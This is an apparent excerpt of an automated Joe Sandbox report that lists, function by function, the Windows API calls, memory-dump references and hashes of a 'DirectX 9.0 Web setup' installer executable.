                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 9bfb39b486322ac668261688a7a5e61f2137a86f97e3518c83b150ea2e59270c
                                                                                                • Instruction ID: da6b65ada72e5227994d070599185fef503f662e9f89374a7cd07d64c63b9061
                                                                                                • Opcode Fuzzy Hash: 9bfb39b486322ac668261688a7a5e61f2137a86f97e3518c83b150ea2e59270c
                                                                                                • Instruction Fuzzy Hash: 8501B9B2514A097DF7538538DC85F77BADCEB9626DF144729FBE5D50D0C229C8418220
                                                                                                Function 01002C23 Relevance: 3.0, APIs: 2, Instructions: 46fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0100288F: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
                                                                                                  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
                                                                                                  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
                                                                                                • WriteFile.KERNELBASE(?,?,?,00000000), ref: 01002C59
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1084409-0
                                                                                                • Opcode ID: d96f9e2c227fc8fd5b123fd756cf88f8dd5409e60f2e5f7db06c1da812d6ec4c
                                                                                                • Instruction ID: f7ff3d6030b5b4b6263aff2ff2ca75ae18718437ba1bcdff345b54a36bb66057
                                                                                                • Opcode Fuzzy Hash: d96f9e2c227fc8fd5b123fd756cf88f8dd5409e60f2e5f7db06c1da812d6ec4c
                                                                                                • Instruction Fuzzy Hash: 8A01923130030CDBEB278F69EC48F6537A9B790729F008225F6A5865E4CB769964CB00
                                                                                                Function 01004112 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01004127
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(771C4B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$DirectoryMessageWindows
                                                                                                • String ID:
                                                                                                • API String ID: 824312211-0
                                                                                                • Opcode ID: ca96c28c2df01ffdf837ee669907e7b40b94055632e991d685ff63f2d1cff087
                                                                                                • Instruction ID: bca2c9432b1f888fb9469f10f577c2e1376d14a01b837acd07ddd468fc16ab10
                                                                                                • Opcode Fuzzy Hash: ca96c28c2df01ffdf837ee669907e7b40b94055632e991d685ff63f2d1cff087
                                                                                                • Instruction Fuzzy Hash: 0CE04FF5B403057BFA22FBB45D4AFE632AC6710B08F0044A177C5EA0C6E6F4D5848B64
                                                                                                Function 01005BCA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(?,010023AD,?), ref: 01005BCE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 9581c502d22aba61f5526ad2671cdf4715d83c214d9c839e97df5bb296cd7dd6
                                                                                                • Instruction ID: b3f3ffb5a34c765f4dd1797c4ec993e395d72c4c0f957be6f6d41efe976d23e8
                                                                                                • Opcode Fuzzy Hash: 9581c502d22aba61f5526ad2671cdf4715d83c214d9c839e97df5bb296cd7dd6
                                                                                                • Instruction Fuzzy Hash: 5BC08C361148044AA5124230AC020993592AB00239F948B20E1F2C00D0E279D410DD20
                                                                                                Function 01005A00 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01004C18: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
                                                                                                  • Part of subcall function 01004C18: SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
                                                                                                • CloseHandle.KERNEL32(00000000,01005ACB,?,?,01005ACB,00000000), ref: 01005A50
                                                                                                  • Part of subcall function 010058FE: SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
                                                                                                  • Part of subcall function 01002EAF: SetFileAttributesA.KERNEL32(004910B0,00000080,?,?,00000000), ref: 01002EE4
                                                                                                  • Part of subcall function 01002EAF: DeleteFileA.KERNEL32(004910B0,?,?,00000000), ref: 01002EEC
                                                                                                  • Part of subcall function 01002EAF: LocalFree.KERNEL32(004910B0,?,?,00000000), ref: 01002EF7
                                                                                                  • Part of subcall function 01002EAF: LocalFree.KERNEL32(004910B0,?,?,00000000), ref: 01002EFA
                                                                                                  • Part of subcall function 01002EAF: lstrcpyA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
                                                                                                  • Part of subcall function 01002EAF: SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
                                                                                                  • Part of subcall function 0100263F: ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectoryEventFileFreeLocal$AttributesCloseCreateDeleteExitHandleWindowslstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2109604340-0
                                                                                                • Opcode ID: 6bb0501f5843ebe1865109c29f3cf8357a2669cd15ada572a2d507304c427ffa
                                                                                                • Instruction ID: 84a9f70d874b0ce605a0360ea1fac1df0a3d9085ade5438d4a511a43078ce571
                                                                                                • Opcode Fuzzy Hash: 6bb0501f5843ebe1865109c29f3cf8357a2669cd15ada572a2d507304c427ffa
                                                                                                • Instruction Fuzzy Hash: 81F08C31E003419BFB73EFB89D88B5A3BD5AB43250F044448E9C0931D8CB7AC4848F18
                                                                                                Function 01002CB2 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(?,00000000,00000000,01003CF6,00000000,?,?,?,?,?,00000000), ref: 01002CEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: a9b46e3db594f2fcd46db8c9e3fd42ad0b2307defafbda2f4743e6373b85ddb5
                                                                                                • Instruction ID: c15912df4965dd569d42e93d5fd4232a5505faff8a50d4eacb1245b87f6ff462
                                                                                                • Opcode Fuzzy Hash: a9b46e3db594f2fcd46db8c9e3fd42ad0b2307defafbda2f4743e6373b85ddb5
                                                                                                • Instruction Fuzzy Hash: 1BF01275506716EE97E3CF2D994869BBFE5FF84750F12092ED4EEC2290DB3099018B10
                                                                                                Function 01002E03 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 01002E09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 3761449716-0
                                                                                                • Opcode ID: 12b5d25ff1b6920fdbd45c6bb364aca1b53fd2bb8657c90971766ff1ed60e0e7
                                                                                                • Instruction ID: aceb04de2820cb8e4959a70ec4af59ab00b6b623b0161863bd08f56dc2faf270
                                                                                                • Opcode Fuzzy Hash: 12b5d25ff1b6920fdbd45c6bb364aca1b53fd2bb8657c90971766ff1ed60e0e7
                                                                                                • Instruction Fuzzy Hash: 1DA00239648241EBEE529B90DF09B097AA1AB84B02F008544F2CD4519486B68410EF62
                                                                                                Function 01002E10 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 2979337801-0
                                                                                                • Opcode ID: a050d75f0b9f73008538d2428d150b865eddb9cf78cebb317d7b67494dfc1878
                                                                                                • Instruction ID: fe044374dafef1cb320f1ead0a573a760266085682d6567bdb0ea2f0c700d41b
                                                                                                • Opcode Fuzzy Hash: a050d75f0b9f73008538d2428d150b865eddb9cf78cebb317d7b67494dfc1878
                                                                                                • Instruction Fuzzy Hash: 239002304081009BDF165B20DA0D9497B71AB80701F404454A0858016487368850EB01

                                                                                                Non-executed Functions

                                                                                                Function 01001C7F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 86stringfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 01001CAD
                                                                                                • lstrcatA.KERNEL32(?,0100128C), ref: 01001CC1
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 01001CD1
                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 01001CEB
                                                                                                • lstrcmpA.KERNEL32(?,01001288), ref: 01001D02
                                                                                                • lstrcmpA.KERNEL32(?,01001284), ref: 01001D18
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 01001D30
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 01001D59
                                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 01001D67
                                                                                                • DeleteFileA.KERNEL32(?), ref: 01001D74
                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 01001D84
                                                                                                • FindClose.KERNEL32(00000000), ref: 01001D95
                                                                                                • RemoveDirectoryA.KERNEL32(00000000), ref: 01001D9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Findlstrcatlstrcpy$lstrcmp$AttributesCharCloseDeleteDirectoryFirstNextPrevRemovelstrlen
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2233361564-3102400635
                                                                                                • Opcode ID: 678c5ee2d3b4477588ce13c604fb9acbca6998944e647f19a3d9bdee4b119596
                                                                                                • Instruction ID: a00f6dc85045b5a751000bc1c93d4bef5bd8a44fc60f5db9cfdca4d6f7f72306
                                                                                                • Opcode Fuzzy Hash: 678c5ee2d3b4477588ce13c604fb9acbca6998944e647f19a3d9bdee4b119596
                                                                                                • Instruction Fuzzy Hash: 0F3119B690415DABEF62EBB5DD88FCA7BBCAF14340F440592B6C5D2084DBB4D6848F60
                                                                                                Function 0100168B Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 010015F6: LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
                                                                                                  • Part of subcall function 010015F6: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
                                                                                                  • Part of subcall function 010015F6: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
                                                                                                  • Part of subcall function 010015F6: FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
                                                                                                  • Part of subcall function 010015F6: FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,00000000,?,01004E0E,?,?,00000000), ref: 010016CF
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,01004E0E,?,?,00000000), ref: 010016D6
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,00000001,?,01004E0E,?,?,00000000), ref: 010016F6
                                                                                                • GetLastError.KERNEL32(?,01004E0E,?,?,00000000), ref: 01001700
                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,DirectX 9.0 Web setup,?,01004E0E,?,?,00000000), ref: 01001714
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,?,01004E0E,?,?,00000000), ref: 0100172D
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,01004E0E,?,?,00000000), ref: 0100174A
                                                                                                • EqualSid.ADVAPI32(00000004,?,?,01004E0E,?,?,00000000), ref: 01001760
                                                                                                • FreeSid.ADVAPI32(?,?,01004E0E,?,?,00000000), ref: 01001782
                                                                                                • LocalFree.KERNEL32(00000000,?,01004E0E,?,?,00000000), ref: 01001789
                                                                                                • CloseHandle.KERNEL32(?,?,01004E0E,?,?,00000000), ref: 01001793
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2168512254-3102400635
                                                                                                • Opcode ID: bb5fe4861fc728833115231643eac192e69f4f778fcc582930cb2832bc57f699
                                                                                                • Instruction ID: fa5215c0b5e6886bf03ae5b40989aa8fe66889e67d1830d7472693dfac7b44e0
                                                                                                • Opcode Fuzzy Hash: bb5fe4861fc728833115231643eac192e69f4f778fcc582930cb2832bc57f699
                                                                                                • Instruction Fuzzy Hash: A7315E71A00249EFEB23DBA49988EEE7BB9FF04340F5004A5F6C5E2085D775D644CB61
                                                                                                Function 01005D22 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                  • Part of subcall function 01005C1C: CharNextA.USER32(?,00000000,01005DE8,?,?), ref: 01005C55
                                                                                                Strings
                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 01005D9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                • API String ID: 3346862599-1109908249
                                                                                                • Opcode ID: 431f45f9673300b689da86ba081f87beb83a14b1989b5a4117b9124139db4642
                                                                                                • Instruction ID: 083c54a924ab9761291a410baedf6ac57de624089c224ea8294de35afb17b59e
                                                                                                • Opcode Fuzzy Hash: 431f45f9673300b689da86ba081f87beb83a14b1989b5a4117b9124139db4642
                                                                                                • Instruction Fuzzy Hash: 17212571640248DBEB36CFA9DC48B9D37E8AB04715F105129F991D20C3E7BAC488CF91
                                                                                                Function 010018B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 010018EB
                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000004,00000000), ref: 0100190A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 2349140579-3733053543
                                                                                                • Opcode ID: 593663a4c8d54b802f0f1e7a054ef3afb4eab00d1d64c970485e8e945c1f4114
                                                                                                • Instruction ID: 05607d40d37e3d7cfa1acf5e7c24027e9414555ed0db78eb33ce689f5d9f9449
                                                                                                • Opcode Fuzzy Hash: 593663a4c8d54b802f0f1e7a054ef3afb4eab00d1d64c970485e8e945c1f4114
                                                                                                • Instruction Fuzzy Hash: 21014C71642225BAF7329BA28C0DFEF7EACEF06794F000410BA89E40C5D6B5D70496F5
                                                                                                Function 0100263F Relevance: 1.5, APIs: 1, Instructions: 24shutdownCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
                                                                                                  • Part of subcall function 010018B5: GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                  • Part of subcall function 010018B5: OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2795981589-0
                                                                                                • Opcode ID: be1fa5d6ff6b383463169fe5ad6f937a4c193f6604caf8e2e6f9bacbda75ccd5
                                                                                                • Instruction ID: 51cfbc9f9594ef64733f325afd49e40a3b229e39ce56858cbad60d3a963125f2
                                                                                                • Opcode Fuzzy Hash: be1fa5d6ff6b383463169fe5ad6f937a4c193f6604caf8e2e6f9bacbda75ccd5
                                                                                                • Instruction Fuzzy Hash: 5EE08C7068830670FEB327A44E4FB2956D05B5DF18F148589FBC5B90C2CEF9C5918A2A
                                                                                                Function 010080E2 Relevance: .3, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94dfc90b70575c19e3580177b28661a5fa6066ea7c0266af5a04ec66b46a9598
                                                                                                • Instruction ID: f4983a0e36b43ffcb518e60d76000cdcfe8a0af48af8faed87a4da5ec99b531e
                                                                                                • Opcode Fuzzy Hash: 94dfc90b70575c19e3580177b28661a5fa6066ea7c0266af5a04ec66b46a9598
                                                                                                • Instruction Fuzzy Hash: FBB18835A056959BDB1ACF28C4B02EEBBA0BF45314F18C2AED9D65B782C7309A55C7C0
                                                                                                Function 01007E02 Relevance: .3, Instructions: 256COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6cf292941154d0cd74ae677f771b0fd9eb91a69feae1d5814fbd6b05e46b596
                                                                                                • Instruction ID: 2aba7d770cb182b78b7652e6660436575dda3edefe08705f868ec3b507a5431e
                                                                                                • Opcode Fuzzy Hash: a6cf292941154d0cd74ae677f771b0fd9eb91a69feae1d5814fbd6b05e46b596
                                                                                                • Instruction Fuzzy Hash: 30A18331A052959BDB0ACF58C0A01EDFBB0FF15714F1982AED9D66B782C7346A55CB80
                                                                                                Function 0100791E Relevance: .2, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84d648d0c2a16e755c7f17ce33ad772204976945cc31b9215aee01e7bcf3b4c0
                                                                                                • Instruction ID: a80a0796c6c78a90fa091916d3490ddb8f164fad7c0897db2317df91665225f3
                                                                                                • Opcode Fuzzy Hash: 84d648d0c2a16e755c7f17ce33ad772204976945cc31b9215aee01e7bcf3b4c0
                                                                                                • Instruction Fuzzy Hash: 7B8186319056569FDB1ACF58C0E01EDBBB0FF46314F1882ADD9D66B382C6346A95CBC0
                                                                                                Function 0100878E Relevance: .2, Instructions: 203COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
